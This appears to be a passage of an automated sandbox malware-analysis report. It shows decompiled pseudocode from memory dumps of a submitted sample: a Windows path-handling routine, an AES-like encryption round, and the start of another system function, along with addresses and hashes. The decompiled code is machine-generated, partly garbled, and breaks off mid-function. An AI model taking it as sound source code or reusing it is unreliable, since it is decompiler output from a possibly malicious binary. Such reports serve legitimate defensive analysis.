													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M017345F8))) {
												case 0:
													_v568 = 0x16f1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x16f11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L01734620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															L0175F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															L0175F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E017152A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0172EB70(1, 0x18079a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0172AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E017595D0();
																			L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return L0175B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E01753D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return L0175B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x01734128
0x01734135
0x0173413c
0x01734141
0x01734145
0x01734147
0x0173414e
0x01734151
0x01734159
0x0173415c
0x01734160
0x01734164
0x01734168
0x0173416c
0x0173417f
0x01734181
0x0173446a
0x0173446a
0x0173418c
0x01734195
0x01734199
0x01734432
0x01734439
0x0173443d
0x01734442
0x01734447
0x00000000
0x0173419f
0x017341a3
0x017341b1
0x017341b9
0x017341bd
0x017345db
0x017345db
0x00000000
0x017341c3
0x017341c3
0x017341ce
0x017341d4
0x0177e138
0x0177e13e
0x0177e169
0x0177e16d
0x0177e19e
0x0177e16f
0x0177e16f
0x0177e175
0x0177e179
0x0177e18f
0x0177e193
0x00000000
0x0177e199
0x00000000
0x0177e199
0x0177e193
0x00000000
0x00000000
0x00000000
0x017341da
0x017341da
0x017341df
0x017341e4
0x017341ec
0x01734203
0x01734207
0x0177e1fd
0x01734222
0x01734226
0x0177e1f3
0x0177e1f3
0x0173422c
0x0173422c
0x01734233
0x0177e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01734239
0x01734239
0x01734239
0x01734239
0x01734233
0x01734226
0x017341ee
0x017341ee
0x017341f4
0x01734575
0x0177e1b1
0x0177e1b1
0x00000000
0x0173457b
0x0173457b
0x01734582
0x0177e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x01734588
0x01734588
0x0173458c
0x0177e1c4
0x0177e1c4
0x00000000
0x01734592
0x01734592
0x01734599
0x0177e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x0173459f
0x0173459f
0x017345a3
0x0177e1d7
0x0177e1e4
0x00000000
0x017345a9
0x017345a9
0x017345b0
0x0177e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x017345b6
0x017345b6
0x017345b6
0x00000000
0x017345b6
0x017345b0
0x017345a3
0x01734599
0x0173458c
0x01734582
0x00000000
0x00000000
0x00000000
0x00000000
0x017341f4
0x0173423e
0x01734241
0x017345c0
0x017345c4
0x00000000
0x017345ca
0x017345ca
0x00000000
0x0177e207
0x0177e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x017345d1
0x00000000
0x00000000
0x017345ca
0x00000000
0x01734247
0x01734247
0x01734247
0x01734249
0x01734249
0x01734249
0x01734251
0x01734251
0x01734257
0x0173425f
0x0173426e
0x01734270
0x0173427a
0x0177e219
0x0177e219
0x01734280
0x01734282
0x01734456
0x017345ea
0x00000000
0x017345f0
0x0177e223
0x00000000
0x0177e223
0x0173445c
0x0173445c
0x00000000
0x0173445c
0x00000000
0x01734288
0x0173428c
0x0177e298
0x01734292
0x01734292
0x0173429e
0x017342a3
0x017342a7
0x017342ac
0x0177e22d
0x017342b2
0x017342b2
0x017342b9
0x017342bc
0x017342c2
0x017342ca
0x017342cd
0x017342cd
0x017342d4
0x0173433f
0x0173433f
0x017342d6
0x017342d6
0x017342d9
0x017342dd
0x017342eb
0x0177e23a
0x017342f1
0x01734305
0x0173430d
0x01734315
0x01734318
0x0173431f
0x01734322
0x0173432e
0x0173433b
0x0173433b
0x00000000
0x0173432e
0x017342eb
0x0173434c
0x0173434e
0x01734352
0x01734359
0x0173435e
0x01734361
0x0173436e
0x0173438a
0x0173438e
0x01734396
0x0173439e
0x017343a1
0x017343ad
0x017343bb
0x017343bb
0x017343ad
0x0173436e
0x017343bf
0x017343c5
0x01734463
0x01734463
0x017343ce
0x017343d5
0x017343d9
0x017343df
0x01734475
0x01734479
0x01734491
0x01734491
0x01734479
0x017343e5
0x017343eb
0x017343f4
0x017343f6
0x017343f9
0x017343fc
0x017343ff
0x017344e8
0x017344ed
0x017344f3
0x0177e247
0x00000000
0x017344f9
0x01734504
0x01734508
0x0173450f
0x0177e269
0x00000000
0x01734515
0x01734519
0x01734531
0x01734534
0x01734537
0x0173453e
0x01734541
0x0173454a
0x0177e255
0x0177e255
0x0177e25b
0x0177e25e
0x0177e261
0x0177e261
0x01734555
0x01734559
0x0173455d
0x0177e26d
0x0177e270
0x0177e274
0x0177e27a
0x0177e27d
0x0177e28e
0x0177e28e
0x01734563
0x01734563
0x01734569
0x01734569
0x00000000
0x0173455d
0x0173450f
0x00000000
0x017344f3
0x017343ff
0x01734405
0x01734405
0x01734405
0x017342ac
0x0173428c
0x01734282
0x01734407
0x0173440d
0x0177e2af
0x0177e2af
0x01734413
0x01734413
0x00000000
0x017341d4
0x00000000
0x017341c3
0x017341bd
0x01734415
0x01734415
0x01734416
0x01734417
0x01734429
0x0173416e
0x0173416e
0x01734175
0x01734498
0x0173449f
0x0177e12d
0x00000000
0x0177e133
0x00000000
0x0177e133
0x017344a5
0x017344a5
0x017344aa
0x00000000
0x017344bb
0x017344ca
0x017344d6
0x017344d7
0x017344d8
0x017344e3
0x017344e3
0x017344aa
0x0173417b
0x0173417b
0x0173417b
0x00000000
0x0173417b
0x01734175
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 558ddb306484f01b479be8bccc361b23d906dee0c8dd1cadb7bf24e3687aa9ec
Instruction ID: e638c8447fa5b13e186be368df5b1c46e123f28e9b77a82d296cbaf8827c31d5
Opcode Fuzzy Hash: 558ddb306484f01b479be8bccc361b23d906dee0c8dd1cadb7bf24e3687aa9ec
Instruction Fuzzy Hash: 0AF17D716082118FDB28CF58C484A7AFBE1FF98714F14496EF986CB292E734D981CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A82FB0 Relevance: .4, Instructions: 435
COMMONCrypto

Download Yara Rule

C-Code - Quality: 26%

			E00A82FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t282;
				signed int* _t358;
				signed int _t383;
				signed int* _t409;
				signed int _t429;
				signed int _t458;
				signed int _t478;
				signed int _t560;
				signed int _t603;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t458;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t282;
				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t409 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
				_t478 = (_a4 >> 1) - 1;
				_a4 = _t478;
				if(_t478 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t383;
						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
						_v12 = _t560;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t409 =  &(_t409[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t358 = _a8;
				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				asm("rol edi, 0x8");
				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
				return _t274;
			}

0x00a82fb0
0x00a82fbf
0x00a82fc8
0x00a82fd6
0x00a82fda
0x00a82fe3
0x00a82ff4
0x00a82ff7
0x00a82ffc
0x00a83005
0x00a83013
0x00a83018
0x00a83021
0x00a83031
0x00a83051
0x00a83054
0x00a83066
0x00a8306b
0x00a83080
0x00a8309d
0x00a830a0
0x00a830b1
0x00a830c6
0x00a830e6
0x00a830e9
0x00a830fb
0x00a83119
0x00a83136
0x00a83139
0x00a8314b
0x00a83160
0x00a83166
0x00a8316e
0x00a8316f
0x00a83172
0x00a83180
0x00a83190
0x00a831a2
0x00a831b4
0x00a831d0
0x00a831e3
0x00a831f0
0x00a83201
0x00a83218
0x00a8323a
0x00a8323d
0x00a8324e
0x00a83269
0x00a83280
0x00a83283
0x00a83295
0x00a8329d
0x00a832b2
0x00a832cf
0x00a832d2
0x00a832e3
0x00a83307
0x00a83317
0x00a8331a
0x00a8332c
0x00a83344
0x00a83347
0x00a8335a
0x00a83367
0x00a83379
0x00a83391
0x00a833b4
0x00a833b7
0x00a833c9
0x00a833de
0x00a833e4
0x00a833e4
0x00a833e7
0x00a833e7
0x00a83180
0x00a8344b
0x00a83454
0x00a83462
0x00a834c0
0x00a834c9
0x00a834d7
0x00a83539
0x00a83542
0x00a8354f
0x00a83552
0x00a8359e
0x00a835aa
0x00a835b3
0x00a835c0
0x00a835c7

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction ID: bea73097e51b29953919fb161d3b7c9a135c21e86e0bd43506f35c5f88b3017f
Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction Fuzzy Hash: 87026E73E547164FE720DE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90

Uniqueness

Uniqueness Score: -1.00%

Function 017420A0 Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E017420A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1808714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = L01742EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = L01742EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E017158EC(_t240);
									_t221 =  *0x1805cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1805cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
